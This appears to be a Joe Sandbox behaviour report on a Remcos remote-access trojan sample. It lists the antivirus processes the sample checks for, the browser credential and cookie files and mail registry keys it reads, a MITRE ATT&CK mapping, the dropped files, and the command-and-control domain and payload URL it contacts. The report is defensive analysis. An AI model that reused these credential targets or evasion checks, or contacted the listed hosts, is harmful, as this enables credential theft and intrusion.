                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: EnumSystemLocalesW,8_2_14AD8404
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: GetLocaleInfoW,8_2_14AE2543
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_14AE2610
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: EnumSystemLocalesW,8_2_14AE1F9B
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: EnumSystemLocalesW,8_2_14AE1F50
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: GetLocaleInfoW,8_2_14AD88ED
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: EnumSystemLocalesW,8_2_14AE2036
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: GetLocaleInfoW,8_2_14AE230A
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: GetLocaleInfoW,8_2_14AE2313
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF Code function: GetLocaleInfoA,8_2_14A9F8D1
                      Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1569B4EF GetLocalTime,0_2_1569B4EF
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_1569B60D GetComputerNameExW,GetUserNameW,0_2_1569B60D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_156C9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_156C9190
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe Code function: 0_2_02DEB748 GetVersionExA,0_2_02DEB748
                      Source: C:\ProgramData\Remcos\remcos.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr Binary or memory string: cmdagent.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr Binary or memory string: quhlpsvc.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr Binary or memory string: avgamsvr.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr Binary or memory string: TMBMSRV.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr Binary or memory string: Vsserv.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.dr Binary or memory string: avgupsvc.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgemc.exe
                      Source: fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441486890.0000000015280000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 0_2_1568BA12
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 0_2_1568BB30
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: \key3.db | 0_2_1568BB30
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
Source: C:\ProgramData\Remcos\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: cmd.exe | 0_2_1568569A
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count of signatures matched to that technique, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Native API (1); Command and Scripting Interpreter (1); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (1); Windows Service (1); Registry Run Keys / Startup Folder (21); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (1); Process Injection (122); Registry Run Keys / Startup Folder (21); Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (11); Valid Accounts (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (11); Process Injection (122); Stripped Payloads
Credential Access: OS Credential Dumping (2); Input Capture (211); Credentials in Registry (1); Credentials In Files (3); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (3); System Information Discovery (47); Security Software Discovery (131); Virtualization/Sandbox Evasion (1); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture (211); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph ID: 1430790 | Sample: fu56fbrtn8.exe | Start date: 24/04/2024 | Architecture: WINDOWS | Score: 100

Top level: contacts oceansss.duckdns.org, web.fe.1drv.com and 6 other IPs or domains. Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); Uses dynamic DNS services (oceansss.duckdns.org); 14 other signatures. Processes started: fu56fbrtn8.exe, Cmzcxhwn.PIF, remcos.exe and 3 other processes.

fu56fbrtn8.exe: connects to dual-spov-0006.spov-msedge.net (13.107.139.11, ports 443, 49705, 49706; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States). Dropped: C:\Users\Public\Libraries\netutils.dll (PE32+), C:\Users\Public\Libraries\easinvoker.exe (PE32+), C:\ProgramData\Remcos\remcos.exe (PE32) and 2 other malicious files. Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Detected unpacking (creates a PE file in dynamic memory); 6 other signatures. Starts remcos.exe, extrac32.exe and cmd.exe.

Cmzcxhwn.PIF: signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Machine Learning detection for dropped file.

remcos.exe (started by fu56fbrtn8.exe): connects to oceansss.duckdns.org (103.186.117.142, ports 1144, 49711, 49712; AARNET-AS-APAustralianAcademicandResearchNetworkAARNe, unknown) and geoplugin.net (178.237.33.50, ports 49714, 80; ATOM86-ASATOM86NL, Netherlands). Dropped: C:\ProgramData\fgdghrd\logs.dat (data). Signatures: Multi AV Scanner detection for dropped file; Detected Remcos RAT; Machine Learning detection for dropped file; 3 other signatures. Starts three remcos.exe child processes and 4 other processes.

extrac32.exe: drops C:\Users\Public\Libraries\Cmzcxhwn.PIF (PE32). Signature: Drops PE files with a suspicious file extension.

cmd.exe: starts conhost.exe.

remcos.exe child processes: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).

Antivirus, Machine Learning and Genetic Malware Detection

Submitted file (Source | Detection | Scanner | Label):
fu56fbrtn8.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos
fu56fbrtn8.exe | 73% | Virustotal
fu56fbrtn8.exe | 100% | Joe Sandbox ML

Dropped files (Source | Detection | Scanner | Label):
C:\Users\Public\Libraries\netutils.dll | 100% | Avira | TR/AVI.Agent.rqsyc
C:\ProgramData\Remcos\remcos.exe | 100% | Joe Sandbox ML
C:\Users\Public\Libraries\Cmzcxhwn.PIF | 100% | Joe Sandbox ML
C:\ProgramData\Remcos\remcos.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos
C:\ProgramData\Remcos\remcos.exe | 73% | Virustotal
C:\Users\Public\Libraries\Cmzcxhwn.PIF | 71% | ReversingLabs | Win32.Backdoor.Remcos
C:\Users\Public\Libraries\Cmzcxhwn.PIF | 73% | Virustotal
C:\Users\Public\Libraries\easinvoker.exe | 0% | ReversingLabs
C:\Users\Public\Libraries\easinvoker.exe | 0% | Virustotal
C:\Users\Public\Libraries\netutils.dll | 83% | ReversingLabs | Win64.Trojan.Acll
C:\Users\Public\Libraries\netutils.dll | 68% | Virustotal

No Antivirus matches

Domains (Source | Detection | Scanner):
dual-spov-0006.spov-msedge.net | 0% | Virustotal
oceansss.duckdns.org | 3% | Virustotal
geoplugin.net | 4% | Virustotal
URLs (Source | Detection | Scanner | Label):
http://www.imvu.comr | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingth | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | URL Reputation | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=wsb | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe
http://ocsp.sectigo.com0C | 0% | URL Reputation | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
http://geoplugin.net/json.gphB | 0% | Avira URL Cloud | safe
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3 | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpL | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpL9 | 0% | Avira URL Cloud | safe
http://www.imvu.comata | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpoft | 0% | Avira URL Cloud | safe
duckdns.org | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpLL | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpL | 0% | Virustotal
http://geoplugin.net/ | 0% | Avira URL Cloud | safe
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717 | 0% | Avira URL Cloud | safe
duckdns.org | 1% | Virustotal
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd | 0% | Avira URL Cloud | safe
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpLL | 0% | Virustotal
http://geoplugin.net/ | 4% | Virustotal
Domains and IPs

Contacted Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
dual-spov-0006.spov-msedge.net | 13.107.139.11 | true | false | none | unknown
oceansss.duckdns.org | 103.186.117.142 | true | true | none | unknown
geoplugin.net | 178.237.33.50 | true | false | none | unknown
onedrive.live.com | unknown | unknown | false | none | high
oqgp5g.db.files.1drv.com | unknown | unknown | false | none | high
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://onedrive.live.com/download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc | false | none | high
duckdns.org | true | 1% Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO | bhv2770.tmp.9.dr | false | - | high
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3 | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://geoplugin.net/json.gphB | remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingth | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net | remcos.exe, 00000009.00000002.1578803145.0000000000193000.00000004.00000010.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1627422473.0000000000194000.00000004.00000010.00020000.00000000.sdmp | false | - | high
https://aefd.nelreports.net/api/report?cat=bingaotak | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | URL Reputation: safe | unknown
